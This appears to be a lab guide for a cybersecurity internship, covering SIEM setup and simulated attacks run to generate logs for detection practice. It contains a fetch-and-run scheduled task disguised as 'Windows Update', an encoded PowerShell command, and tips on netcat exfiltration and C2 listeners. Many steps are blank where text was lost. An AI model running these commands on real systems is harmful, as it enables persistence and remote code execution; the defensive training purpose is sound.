Phase 1 Internship Program Deteiled Guide
Phase 1 Internship Program Deteiled Guide
Objective of Phase 1
To introduce candidates to real-time cybersecurity threat detection use cases through hands-on simulations and
tool-based analysis.
1. Install VirtualBox / VMware + Kali Linux (or use any pre-configured VM).
2. Install ELK Stack (Elasticsearch, Logstash, Kibana) or Wazuh SIEM.
3. Configure Sysmon + Winlogbeat on Windows VM (for endpoint logging).
4. Prepare GitHub Repo:
o Create a GitHub repo named cyber-intern-phase-1.
o Maintain folders like /logs, /reports, /screenshots, /hints.
---------------------------------------------------------------------------------------------------------------
HINTS:
Hint:
Look into authentication logs like /var/log/auth.log or Windows Event ID 4625. Focus on patterns where
multiple failed attempts are made from the same IP in a short time.
2. Malware Detection
Hint:
Use VirusTotal or any.run to analyze suspicious files. In your SIEM, observe unexpected processes, registry
changes, or connections to unknown IPs.
Tip: Try simulating a malware dropper script with curl or Invoke-WebRequest and execute in a lab.
Hint:
Watch for large outbound traffic on non-standard ports. Analyze network logs, and use Wireshark to capture
exfiltration attempts.
Tip: Use netcat to simulate file transfer over HTTP, FTP, or DNS.
Hint:
Use tools like Wireshark or tcpdump to monitor abnormal traffic patterns. Look for port scanning, repeated
connection attempts, or odd DNS queries.
Hint:
Look for email headers, links to shortened or weird domains, and attachments with .exe, .js, or
.vbs extensions. Use email gateways or SIEM to flag these.
Tip: Use the open-source tool “GoPhish” to simulate phishing in your lab.
Tip: Use failed logon Event ID 4625 and success 4624 to compare patterns.
Hint:
Use PowerShell logging (ModuleLogging, ScriptBlockLogging) to catch scripts like:
Hint:
Check for creation of new admin users, or modifications to registry keys, services, or token
impersonation attempts.
Tip: Tools like whoami /priv, accesschk, and winPEAS reveal escalation paths.
Hint:
Monitor SMB, WMI, RDP, or PsExec traffic between internal systems. Use Sysmon Event ID
3 and Windows Event ID 4624 to trace logons.
Hint:
Detect beaconing patterns, especially regular intervals of outbound traffic. Look into PowerShell
Empire, Cobalt Strike, or DNS-based C2.
Tip: Set up a mock listener using Netcat or Empire and track outbound packets.
"If you're stuck, think like a hacker. Then, think how you'd detect it."
STEP 1 Approach
A virtualization tool allows you to run operating systems like Kali Linux or Windows in a sandboxed virtual
environment.
Recommended Options:
• Download: https://www.kali.org/get-kali/#kali-virtual-machines
• Import .ova file into VirtualBox.
• Set CPU: 2 cores, RAM: 4 GB recommended.
Important Settings:
• Install:
o Elasticsearch
o Logstash
o Kibana
• Configure:
o Winlogbeat to send logs from Windows VM to Logstash
o Sysmon to generate detailed logs
Sysmon is a Windows system monitor that logs detailed events like process creations, network connections, and
file modifications.
Install:
Command:
Steps:
output.elasticsearch:
hosts: ["http://your-elk-ip:9200"]
Name: cyber-intern-phase-1
Structure:
/logs/
/screenshots/
/reports/
/hints/
README.md
Push:
• Screenshots of setup
• Config files
• Logs
• Summary notes
Objective of Step 2
Components Involved
Component Purpose
Windows VM Host to perform malicious/suspicious activities
Sysmon Collects deep system-level events
Winlogbeat Forwards Windows event logs to the SIEM
SIEM (Wazuh/ELK) Centralized log storage and analysis
Logs to expect:
Tool Role
PowerShell Simulate commands/attacks
Sysmon Capture deep telemetry
Winlogbeat Send logs to Elasticsearch/Wazuh
Event Viewer Manually view Windows logs
Best Practices
• Brute Force
• Malware
• Data Exfiltration
• Suspicious Network Activity
• USB Activity
• etc.
Purpose of Hints:
To simulate attacker behavior and analyze logs using SIEM tools.
Outcome of Step 2
To simulate realistic cybersecurity scenarios on your Windows VM so that logs can be generated, collected
by Winlogbeat, and analyzed in your SIEM (Wazuh or ELK). These logs will form the foundation for detections
and investigations in future steps.
Make sure:
• Sysmon is running
• Winlogbeat is properly configured and started
• Logs are flowing to your SIEM
You will simulate 10 different activities to generate rich event logs. Below are instructions for each scenario.
What to do:
What to do:
Run the following:
powershell -enc
UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAcwBtAG8AYwBoAC4AZQB4AGUAIgA=
What to do:
• Insert a USB drive into your Windows VM (or simulate via VBox).
• Copy and execute a file from it.
What to do:
@echo off
echo Simulating malware...
ping 8.8.8.8 -n 10
What to do:
What to do:
What to do:
What to do:
schtasks /create /tn "Windows Update" /tr "powershell.exe -nop -w hidden -c IEX(New-Object
Net.WebClient).DownloadString('http://malicious-url')" /sc minute /mo 1
What gets logged:
What to do:
What to do:
1. Go to Kibana/Wazuh dashboard.
2. Check:
o Count of logs (timestamp, host)
o Sysmon logs
o Winlogbeat indices
o Search using:
event.code:"1" OR event.code:"4625"
Folder Structure:
/hints/
└── hint1_brute_force.png
└── hint2_ps_encoded_command.png
...
/logs/
└── event_logs.json
/screenshots/
└── dashboard_kibana.png
Objective of Step 3
The goal of this step is to analyze the logs you generated in Step 2 to:
Logs are the evidence trail left by users, systems, and attackers.
Skill Explanation
Pattern Recognition Repeated failed logins, odd IP access
Correlation Linking process creation to file drops
TTP Mapping Aligning behavior with MITRE ATT&CK
Noise Filtering Separating normal from suspicious activity
Field Value
Event ID 4625
Target Username Admin
Failure Reason Unknown user name or bad password
Source IP 127.0.0.1
Count > 10 in short time
This pattern indicates a brute force attack attempt. It could be automated or targeted.
How to Approach Log Analysis
Steps to Analyze:
Outcome of Step 3
Structure:
Troubleshooting Tips
• Use online sandboxes like TryHackMe or HackTheBox if you don’t have setup.
• Refer to MITRE ATT&CK for tactics and techniques.
• YouTube: Search for “how to simulate brute force with hydra” etc.